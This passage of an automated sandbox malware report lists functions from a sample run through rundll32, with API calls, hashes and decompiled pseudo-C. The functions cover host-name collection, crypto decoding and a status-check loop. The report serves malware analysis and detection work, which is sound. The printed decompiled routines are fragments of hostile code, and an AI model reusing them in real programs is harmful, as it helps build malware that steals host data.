                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: ExitThreadlstrlen
                • String ID:
                • API String ID: 2636182767-0
                • Opcode ID: d02ff361556716031ea6bec9cabf07267ff9448d31515e75f41d89da0bc30c53
                • Instruction ID: d52327a05ec91a1e3f0abcfd8f54c358809bfb752cfc67fb9d79104120d85cf8
                • Opcode Fuzzy Hash: d02ff361556716031ea6bec9cabf07267ff9448d31515e75f41d89da0bc30c53
                • Instruction Fuzzy Hash: D511D072504201ABE711DBA5DD49E9B77ECAB84304F05493BF102FB1F1E738E5448B4A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B94AF1 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                Download Yara Rule
                APIs
                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 04B94B18
                  • Part of subcall function 04B92DB2: SysFreeString.OLEAUT32(?), ref: 04B92E91
                • SafeArrayDestroy.OLEAUT32(?), ref: 04B94B68
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ArraySafe$CreateDestroyFreeString
                • String ID:
                • API String ID: 3098518882-0
                • Opcode ID: 9b41dc272dfd2aac07b8736e2d58bdc6a2285d684dcf0f77d62b97c4788cc397
                • Instruction ID: 3a0e3ce5e2ff7906980d81a285c4a41e71f754abe573560326f3024568cb4f38
                • Opcode Fuzzy Hash: 9b41dc272dfd2aac07b8736e2d58bdc6a2285d684dcf0f77d62b97c4788cc397
                • Instruction Fuzzy Hash: 3E113075900209BFDF019FA4D805AEEBBB9EF04750F008066EA04E7160E775AE15DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B9405E Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B9405E(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E04B92A10(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x4b9a2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E04B94768(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                0x04b9405e
                0x04b94066
                0x04b9407d
                0x04b94098
                0x04b9409c
                0x04b940a1
                0x04b940a3
                0x04b940b5
                0x04b940c1
                0x04b940a5
                0x04b940a5
                0x04b940aa
                0x04b940af
                0x04b940af
                0x04b940a3
                0x04b940c7
                0x04b940cb
                0x04b940cb
                0x04b94072
                0x04b94077
                0x04b9407b
                0x00000000
                0x00000000
                0x00000000

                APIs
                  • Part of subcall function 04B94768: SysFreeString.OLEAUT32(00000000), ref: 04B947CB
                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,746AF710,?,00000000,?,00000000,?,04B9423F,?,004F0053,051093D8,00000000,?), ref: 04B940C1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Free$HeapString
                • String ID: Uet
                • API String ID: 3806048269-2766386878
                • Opcode ID: 2f388d92d0befcddf3468a94f4955451f3f24407042e781bf0b0ef6fd5f7115d
                • Instruction ID: b4ebef8450554d58d1b9eea4aa81651037d3c2de829d8cd8f7320173cea03876
                • Opcode Fuzzy Hash: 2f388d92d0befcddf3468a94f4955451f3f24407042e781bf0b0ef6fd5f7115d
                • Instruction Fuzzy Hash: 0501283250461ABBCF229F64CC00EAA3BA5EF08750F058569BE059B221D731AD61DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B924C5 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E04B924C5(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04B96601(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04B94130(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                0x04b924ca
                0x04b924d5
                0x04b924d7
                0x04b924dd
                0x04b924df
                0x04b924e4
                0x04b924ed
                0x04b924f1
                0x04b924fa
                0x04b924fe
                0x04b9250d
                0x04b92500
                0x04b92501
                0x04b92506
                0x04b92506
                0x04b924fe
                0x04b924f1
                0x04b92516

                APIs
                • GetComputerNameExA.KERNEL32(00000003,00000000,04B96CDC,00000000,00000000,?,76B5C740,04B96CDC), ref: 04B924DD
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • GetComputerNameExA.KERNEL32(00000003,00000000,04B96CDC,04B96CDD,?,76B5C740,04B96CDC), ref: 04B924FA
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ComputerHeapName$AllocateFree
                • String ID:
                • API String ID: 187446995-0
                • Opcode ID: ef6dc7a8254ea954fffa5e589b9b1080e19524d23918ab8361f92b92553673ac
                • Instruction ID: 19d372264d6c1b397dc8a001c9c15863ac12159a39b7c7cb28c755a9c829e281
                • Opcode Fuzzy Hash: ef6dc7a8254ea954fffa5e589b9b1080e19524d23918ab8361f92b92553673ac
                • Instruction Fuzzy Hash: 13F05E76A00119BAEF11D6AA8D20EAF7BECDBC5754F1140FAAD04D3141EA70EE019670
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B968E3 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B968E3(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4b9a2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x4b9a1c8 = GetTickCount();
				_t5 = E04B9236F(_a4);
				if(_t5 == 0) {
					_t5 = E04B96599(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E04B955C3(_t9) != 0) {
							 *0x4b9a300 = 1; // executed
						}
						_t7 = E04B9349A(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









                0x04b968e3
                0x04b968ec
                0x04b968f2
                0x04b968f9
                0x04b968fd
                0x00000000
                0x04b968fd
                0x04b9690a
                0x04b9690f
                0x04b96916
                0x04b9691c
                0x04b96923
                0x04b9692c
                0x04b9692e
                0x04b9692e
                0x04b96938
                0x00000000
                0x04b96938
                0x04b96923
                0x04b9693d

                APIs
                • HeapCreate.KERNEL32(00000000,00400000,00000000,04B92F29,?), ref: 04B968EC
                • GetTickCount.KERNEL32 ref: 04B96900
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: CountCreateHeapTick
                • String ID:
                • API String ID: 2177101570-0
                • Opcode ID: ad7d294f483502e8e04a5b6a68cf3c43080ef4e31bc224841155067a2fe2f9c6
                • Instruction ID: e5f1993cff60bb63a38d0c6f477a30b5d93323c15796d059799d55f680bd31db
                • Opcode Fuzzy Hash: ad7d294f483502e8e04a5b6a68cf3c43080ef4e31bc224841155067a2fe2f9c6
                • Instruction Fuzzy Hash: 60F039B0644301ABEF612F709E15B1937D4EB6C748F1044BAE84196281EB75EC149631
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B9469F Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B9469F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x4b9a368; // 0x5109668
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E04B967A3( &_v68) == 0) {
						goto L16;
					}
					_t30 = E04B963F7(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E04B971C3(_t31, 0x102, _t28, _t30); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E04B9A000 = E04B9A000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E04B92062( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x4b9a30c, 0) == 0x102);
				return _t30;
			}


















                0x04b9469f
                0x04b946a5
                0x04b946ac
                0x04b946b4
                0x04b946ba
                0x04b946bd
                0x04b946bf
                0x04b946bf
                0x04b946c7
                0x04b946c7
                0x04b946d1
                0x00000000
                0x00000000
                0x04b946e0
                0x04b946e4
                0x04b946e8
                0x04b946ed
                0x04b946f1
                0x04b9472d
                0x04b9472f
                0x04b9472f
                0x04b946f3
                0x04b946fa
                0x04b94724
                0x04b946fc
                0x04b946fc
                0x04b94701
                0x04b9471d
                0x04b94703
                0x04b94703
                0x04b94708
                0x04b9470d
                0x04b94710
                0x04b94712
                0x04b94717
                0x04b94719
                0x04b94719
                0x04b94717
                0x04b94708
                0x04b94701
                0x04b946fa
                0x04b946f1
                0x04b9473c
                0x04b94741
                0x04b94741
                0x04b94765

                APIs
                • WaitForSingleObject.KERNEL32(00000000,746981D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B94751
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ObjectSingleWait
                • String ID:
                • API String ID: 24740636-0
                • Opcode ID: 409d1c061cee61321b3b87f9991f9f735ff1fb48cc634c6776598755879ba798
                • Instruction ID: 9a2d029194d67fc9019cf0cb47ca3f053bdd79c0cd78f8c76d9564bc341476a1
                • Opcode Fuzzy Hash: 409d1c061cee61321b3b87f9991f9f735ff1fb48cc634c6776598755879ba798
                • Instruction Fuzzy Hash: 1221C075B082199BDF109E69E880B7E37F1EB86355F1444BAE5019B240EB78FC03CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B94768 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                Download Yara Rule
                C-Code - Quality: 34%
                			E04B94768(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4b9a348; // 0x56d5a8
				_t4 = _t15 + 0x4b9b3a0; // 0x5108948
				_t20 = _t4;
				_t6 = _t15 + 0x4b9b124; // 0x650047
				_t17 = E04B92DB2(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04B960AE(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                0x04b94772
                0x04b94779
                0x04b9477a
                0x04b9477b
                0x04b9477c
                0x04b94782
                0x04b94787
                0x04b94787
                0x04b94791
                0x04b947a3
                0x04b947aa
                0x04b947d8
                0x04b947ac
                0x04b947ae
                0x04b947b3
                0x04b947d5
                0x04b947b5
                0x04b947b8
                0x04b947bf
                0x04b947c4
                0x04b947c6
                0x04b947c6
                0x04b947cb
                0x04b947cb
                0x04b947b3
                0x04b947df

                APIs
                  • Part of subcall function 04B92DB2: SysFreeString.OLEAUT32(?), ref: 04B92E91
                  • Part of subcall function 04B960AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04B91B9D,004F0053,00000000,?), ref: 04B960B7
                  • Part of subcall function 04B960AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04B91B9D,004F0053,00000000,?), ref: 04B960E1
                  • Part of subcall function 04B960AE: memset.NTDLL ref: 04B960F5
                • SysFreeString.OLEAUT32(00000000), ref: 04B947CB
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeString$lstrlenmemcpymemset
                • String ID:
                • API String ID: 397948122-0
                • Opcode ID: 584afff6c8c71eb061a6b2683be3bc06674be4480e1660905e48e1a6d4b59cd7
                • Instruction ID: 50d112e4d7763e3a18c08d3b74abf610be69098f4aa32df3f6d6605a77197fcd
                • Opcode Fuzzy Hash: 584afff6c8c71eb061a6b2683be3bc06674be4480e1660905e48e1a6d4b59cd7
                • Instruction Fuzzy Hash: 69015A3250811DBFDF119FA8DC44AAABBF8FB09650F0245B5E901E7160E770BD26D7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00401000(void* __eax, intOrPtr _a4) {

				 *0x4041d0 =  *0x4041d0 & 0x00000000;
				_push(0);
				_push(0x4041cc);
				_push(1);
				_push(_a4);
				 *0x4041c8 = 0xc; // executed
				L00401BA2(); // executed
				return __eax;
			}



                0x00401000
                0x00401007
                0x00401009
                0x0040100e
                0x00401010
                0x00401014
                0x0040101e
                0x00401023

                APIs
                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004014BD,00000001,004041CC,00000000), ref: 0040101E
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: DescriptorSecurity$ConvertString
                • String ID:
                • API String ID: 3907675253-0
                • Opcode ID: 37af6f00a77537efc37b23bb70d6860b5876bfe7e8c58cb1fa62402c62a4aca0
                • Instruction ID: 45b1448024c329e41afd5f71cfa77259409b52a3945600e678917a681f6de999
                • Opcode Fuzzy Hash: 37af6f00a77537efc37b23bb70d6860b5876bfe7e8c58cb1fa62402c62a4aca0
                • Instruction Fuzzy Hash: E4C04CF4150301A6E720AF41DD4AF057A6177A4709F60062AF744381E193F91094851D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401B8C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401B8C(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x404190, 0, _a4); // executed
				return _t2;
			}




                0x00401b98
                0x00401b9e

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000030,004017C9,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401C96), ref: 00401B98
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: abc11f7c57601308c0ba86a323f0ba82c3b2411acb0f21e52ae6c0c96be0e5ba
                • Instruction ID: 09f3c75a0de5bb76688b38889c6d9a72f08869835e8dc28867f98c0c05acd796
                • Opcode Fuzzy Hash: abc11f7c57601308c0ba86a323f0ba82c3b2411acb0f21e52ae6c0c96be0e5ba
                • Instruction Fuzzy Hash: ACB01271040100EBDA118F40EF08F057E23B7E4701F008030F3042407882318C20FB1C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401634 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401634(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x404190, 0, _a4); // executed
				return _t2;
			}




                0x00401640
                0x00401646

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00401C48,00000030,746563F0,00000000), ref: 00401640
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: b0813956299859ea67c94b512f80fe789525e17335b79748474c450a24d7706a
                • Instruction ID: 6ad9520f00aac799c90b5c0c5a3fb88398e4ebc8daf544e6327ea4daa66fc328
                • Opcode Fuzzy Hash: b0813956299859ea67c94b512f80fe789525e17335b79748474c450a24d7706a
                • Instruction Fuzzy Hash: ECB012B1100100ABCA015F41EF08F06BF22B7A4701F004030F3082407883311860EB0C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B96601 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B96601(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x4b9a2d8, 0, _a4); // executed
				return _t2;
			}




                0x04b9660d
                0x04b96613

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 545a12f9fabf7021c2f246db1b2c43958977617248211c190d676cc3604f1f24
                • Instruction ID: 2531b090f2d4db07fb09433d9ae8a17118d498a0f9c4cd2940c164814c75ca49
                • Opcode Fuzzy Hash: 545a12f9fabf7021c2f246db1b2c43958977617248211c190d676cc3604f1f24
                • Instruction Fuzzy Hash: 88B01271100200BBEE014B10DF09F057B21F754700F004016B204410708A370C64FB34
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BB1E0D Relevance: 1.3, APIs: 1, Instructions: 86memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.773208004.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_bb0000_rundll32.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: c413b262abfedbeff8608700365e630dad58d776462ba9f9178ae43d9c4aabf0
                • Instruction ID: c1d21a3b5c6e25b60359f5d5adf197913a40fe7c32d506168c31053592ccdcdf
                • Opcode Fuzzy Hash: c413b262abfedbeff8608700365e630dad58d776462ba9f9178ae43d9c4aabf0
                • Instruction Fuzzy Hash: C64107B49002058FDB04DF59C5587AEBBF0FF48304F1589ADD858AB341D7B6A945CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B95310 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E04B95310(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E04B96EB4( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E04B96601(_a8 + _a8);
					if(_t21 != 0) {
						E04B910E5(_a4, _t21, _t23);
					}
					E04B94130(_a4);
				}
				return _t21;
			}





                0x04b95318
                0x04b9531f
                0x04b95321
                0x04b95330
                0x04b95337
                0x04b95346
                0x04b9534a
                0x04b95351
                0x04b95351
                0x04b95359
                0x04b9535e
                0x04b95363

                APIs
                • lstrlen.KERNEL32(00000000,00000000,04B96DDD,00000000,?,04B95DEE,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95321
                  • Part of subcall function 04B96EB4: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04B95335,00000001,04B96DDD,00000000), ref: 04B96EEC
                  • Part of subcall function 04B96EB4: memcpy.NTDLL(04B95335,04B96DDD,00000010,?,?,?,04B95335,00000001,04B96DDD,00000000,?,04B95DEE,00000000,04B96DDD,?,76B5C740), ref: 04B96F05
                  • Part of subcall function 04B96EB4: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04B96F2E
                  • Part of subcall function 04B96EB4: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04B96F46
                  • Part of subcall function 04B96EB4: memcpy.NTDLL(00000000,76B5C740,05109600,00000010), ref: 04B96F98
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                • String ID:
                • API String ID: 894908221-0
                • Opcode ID: 7f0ba937a9877f1c4d5e550a623273f400c82fe5fdecc1dea6686f32938f8e2d
                • Instruction ID: 1ba90b845c667362a24adfe0afb93e0749edcbef5064827357cc36459169e7c5
                • Opcode Fuzzy Hash: 7f0ba937a9877f1c4d5e550a623273f400c82fe5fdecc1dea6686f32938f8e2d
                • Instruction Fuzzy Hash: 84F03077100119BBDF126E66DC04CDA3FEDDF85354B008072FD198A114DA71ED5597A0
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 04B94CAB Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 93%
                			E04B94CAB(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t116;
				void* _t119;
				intOrPtr _t122;

				_t119 = __esi;
				_t116 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x4b9a344; // 0x69b25f44
